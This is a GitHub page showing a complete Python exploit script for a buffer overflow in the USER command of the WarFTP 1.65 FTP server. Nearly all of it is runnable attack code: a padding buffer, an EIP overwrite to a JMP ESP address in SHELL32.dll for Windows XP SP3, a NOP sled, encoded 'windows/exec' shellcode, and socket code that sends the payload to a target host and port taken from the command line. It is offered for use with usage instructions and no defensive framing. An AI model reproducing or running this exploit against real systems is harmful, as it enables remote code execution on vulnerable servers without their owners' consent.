-
Notifications
You must be signed in to change notification settings - Fork 1
/
WarFTP1.65-'USER'BufferOverflow.py
38 lines (35 loc) · 1.65 KB
/
WarFTP1.65-'USER'BufferOverflow.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#!/usr/bin/env python
import socket,sys
#How To Use: python exploit.py [target] [port] or ./exploit.py [target] [port]
junk = 485 * "\x41"
eip = "\x69\x2D\xB3\x7C" #JMP ESP SHELL32.dll 7CB32D69
#Shellcode Payload:"windows/exec" Badchars:"\x00\x0a\x20\x40\xff" Target OS:"Windows XP SP3 En"
buf = ""
buf += "\xda\xc5\xd9\x74\x24\xf4\xbf\x29\xbc\xa9\x97\x5b\x31"
buf += "\xc9\xb1\x31\x31\x7b\x18\x03\x7b\x18\x83\xc3\x2d\x5e"
buf += "\x5c\x6b\xc5\x1c\x9f\x94\x15\x41\x29\x71\x24\x41\x4d"
buf += "\xf1\x16\x71\x05\x57\x9a\xfa\x4b\x4c\x29\x8e\x43\x63"
buf += "\x9a\x25\xb2\x4a\x1b\x15\x86\xcd\x9f\x64\xdb\x2d\x9e"
buf += "\xa6\x2e\x2f\xe7\xdb\xc3\x7d\xb0\x90\x76\x92\xb5\xed"
buf += "\x4a\x19\x85\xe0\xca\xfe\x5d\x02\xfa\x50\xd6\x5d\xdc"
buf += "\x53\x3b\xd6\x55\x4c\x58\xd3\x2c\xe7\xaa\xaf\xae\x21"
buf += "\xe3\x50\x1c\x0c\xcc\xa2\x5c\x48\xea\x5c\x2b\xa0\x09"
buf += "\xe0\x2c\x77\x70\x3e\xb8\x6c\xd2\xb5\x1a\x49\xe3\x1a"
buf += "\xfc\x1a\xef\xd7\x8a\x45\xf3\xe6\x5f\xfe\x0f\x62\x5e"
buf += "\xd1\x86\x30\x45\xf5\xc3\xe3\xe4\xac\xa9\x42\x18\xae"
buf += "\x12\x3a\xbc\xa4\xbe\x2f\xcd\xe6\xd4\xae\x43\x9d\x9a"
buf += "\xb1\x5b\x9e\x8a\xd9\x6a\x15\x45\x9d\x72\xfc\x22\x51"
buf += "\x39\x5d\x02\xfa\xe4\x37\x17\x67\x17\xe2\x5b\x9e\x94"
buf += "\x07\x23\x65\x84\x6d\x26\x21\x02\x9d\x5a\x3a\xe7\xa1"
buf += "\xc9\x3b\x22\xc2\x8c\xaf\xae\x2b\x2b\x48\x54\x34"
nop = 40 * "\x90"
exploit = junk + eip + nop + buf
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1],int(sys.argv[2])))
s.recv(1024)
s.send("USER " + exploit + "\r\n")
s.recv(1024)
s.send("PASS password " + "\r\n")
s.recv(1024)
s.close()
print("\nExploit Completed :)\n")